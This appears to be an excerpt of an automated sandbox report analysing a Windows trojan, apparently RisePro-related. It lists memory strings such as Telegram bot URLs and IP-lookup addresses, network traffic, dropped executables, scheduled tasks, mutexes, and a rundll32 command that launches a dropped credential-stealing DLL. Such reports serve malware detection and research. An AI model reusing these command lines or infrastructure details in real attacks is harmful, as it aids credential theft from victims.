0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C4E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C643E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C631F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C643E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/%
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/?
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/O
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/W
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.603
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.609
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60e
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60l
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60r
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60u
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.60z
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/y
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.00000000015C1000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.000000000139C000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60j11
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.60z
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/B
Source: MPGPH131.exe, 00000014.00000002.2899702692.00000000011FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/E
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D31000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000156D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/s
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000159E000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AA8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.604
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.607g
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60D
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60G
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.54.60s
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.000000000139C000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60P
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.54.60R
Source: powershell.exe, 0000000B.00000002.2432332718.00000246D4E79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t..
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001378000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000002.2900005103.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001C.00000002.2892698190.0000000000A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT.C
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT7uW
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTW
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTy
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.60$
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.604
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot4y
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot:y
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot=
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botH
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot=y
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlaterH
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botrisepro4.60#
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49794 version: TLS 1.2

System Summary

Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: .idata
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: .idata
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: .idata
Source: explorgu.exe.24.dr Static PE information: section name:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Windows\Tasks\explorha.job
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File created: C:\Windows\Tasks\explorgu.job
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B05DC8 0_2_00B05DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B4A220 0_2_00B4A220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B04E60 0_2_00B04E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004CA220 1_2_004CA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C4330 1_2_004C4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004B94E3 1_2_004B94E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8DBB 1_2_004C8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8669 1_2_004C8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00484E60 1_2_00484E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C8EDB 1_2_004C8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004C47C8 1_2_004C47C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004CA220 2_2_004CA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C4330 2_2_004C4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004B94E3 2_2_004B94E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8DBB 2_2_004C8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8669 2_2_004C8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00484E60 2_2_00484E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C8EDB 2_2_004C8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004C47C8 2_2_004C47C8
Source: Joe Sandbox View Dropped File: C:\ProgramData\MPGPH131\MPGPH131.exe BECE1D107F2CFC2BF0D759D561578019ECD8C976D0143088FBC2BE78F69185DA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: String function: 00B19750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0049F620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00499750 appears 244 times
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: Section: ZLIB complexity 0.9982091990616622
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982091990616622
Source: ad0e9cf6d6.exe.6.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: ad0e9cf6d6.exe.6.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9918870192307693
Source: sarra[1].exe.6.dr Static PE information: Section: plzndgzq ZLIB complexity 0.9895639173656415
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: amert[1].exe.6.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: amert.exe.6.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: random[1].exe0.6.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: RageMP131.exe.14.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: RageMP131.exe.14.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: MPGPH131.exe.14.dr Static PE information: Section: ZLIB complexity 0.9918853682375317
Source: MPGPH131.exe.14.dr Static PE information: Section: kmmiqwbd ZLIB complexity 0.989375925420823
Source: explorgu.exe.24.dr Static PE information: Section: ZLIB complexity 0.9975303460743802
Source: explorgu.exe.24.dr Static PE information: Section: nrhwmcml ZLIB complexity 0.9945326756386861
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@38/31@3/5
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: cred64[1].dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
